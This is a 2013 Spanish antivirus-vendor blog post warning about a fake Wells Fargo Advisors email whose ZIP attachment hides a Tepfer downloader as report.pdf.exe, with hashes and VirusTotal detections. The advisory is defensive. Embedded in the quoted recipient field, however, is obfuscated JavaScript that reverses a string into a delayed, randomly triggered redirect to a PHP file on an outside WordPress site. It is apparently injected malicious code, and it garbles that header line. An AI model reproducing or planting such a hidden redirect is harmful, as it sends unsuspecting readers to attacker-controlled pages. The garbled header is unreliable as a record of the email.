MAIL MASIVO QUE SE ESTA RECIBIENDO CON FICHERO ANEXADO MALICIOSO (TEPFER DLDR)
Se está recibiendo este mail anexando fichero REPORT.ZIP que contiene un fichero del mismo nombre con doble extension .PDF.EXE , con icono típico de PDF
El texto del mail es el siguiente:
_________________________________
Asunto: Wells Fargo Advisors
De: “WELLS FARGO” <tokreditbank.ru”>office@autokreditbank.ru>
Fecha: 12/11/2013 13:34
Para: <$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:John_Deen@wellsfargo.com”>John_Deen@wellsfargo.com
Investments in securities and insurance products are:
NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE Wells Fargo Advisors, LLC is a nonbank affiliate of Wells Fargo & Company, Member FINRA/SIPC.
1 North Jefferson, St. Louis, MO 63103
CONFIDENTIAL NOTICE: The contents of this message, including any attachments, are confidential and are intended solely for the use of the person or entity to whom the message was addressed. If you are not the intended recipient of this message, please be advised that any dissemination, distribution, or use of the contents of this message is strictly prohibited. If you received this message in error, please notify the sender. Please also permanently delete all copies of the original message and any attached documentation. Thank you.
______________________
fin del mail malicioso
A partir del ELISTARA 28.75 de hoy pasamos a controlarlo como downloader TEPFER
El preanalisis del fichero anexado subido al virustotal, ofrece el siguiente informe:
MD5 a4303e990f9afe25f0d3055266cff3b7
SHA1 100582393cc6df00dfcc003de535c09eca5dde4a
File size 33.5 KB ( 34304 bytes )
SHA256: 64ad0e3952f06ac1bdaa189406538b972727c314463d24430fcd5c50170365ca
Nombre: report.pdf.exe
Detecciones: 9 / 47
Fecha de análisis: 2013-11-12 14:36:00 UTC ( hace 0 minutos )
0 1 Análisis File detail Información adicional Comentarios Votos
Antivirus Resultado Actualización
Agnitum 20131111
AhnLab-V3 20131112
AntiVir TR/Crypt.XPACK.Gen3 20131112
Antiy-AVL 20131112
Avast Win32:Malware-gen 20131112
AVG 20131112
Baidu-International 20131112
BitDefender 20131112
Bkav 20131112
ByteHero 20131111
CAT-QuickHeal 20131112
ClamAV 20131112
Commtouch 20131112
Comodo 20131112
DrWeb 20131112
Emsisoft 20131112
ESET-NOD32 Win32/Wigon.PH 20131112
F-Prot 20131112
F-Secure 20131112
Fortinet W32/Small.ABS!tr 20131112
GData 20131112
Ikarus Trojan-PWS.Fareit 20131112
Jiangmin 20131112
K7AntiVirus 20131111
K7GW 20131111
Kaspersky Trojan.Win32.Badur.eisf 20131112
Kingsoft 20130829
Malwarebytes 20131112
McAfee 20131112
McAfee-GW-Edition 20131111
Microsoft 20131112
MicroWorld-eScan 20131112
NANO-Antivirus 20131111
Norman 20131112
nProtect 20131112
Panda 20131111
Rising 20131112
Sophos Troj/Zbot-GUM 20131112
SUPERAntiSpyware 20131112
Symantec Downloader 20131112
TheHacker 20131112
TotalDefense 20131111
TrendMicro 20131112
TrendMicro-HouseCall TROJ_GEN.F0D1H00KC13 20131112
VBA32 20131112
VIPRE 20131112
ViRobot 20131112
Dicha version del ELISTARA 28.75 que lo detecta y elimina, estará disponible en nuestra web a partir de las 19 h CEST de hoy
saludos
ms, 12-11-2013
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Los comentarios están cerrados.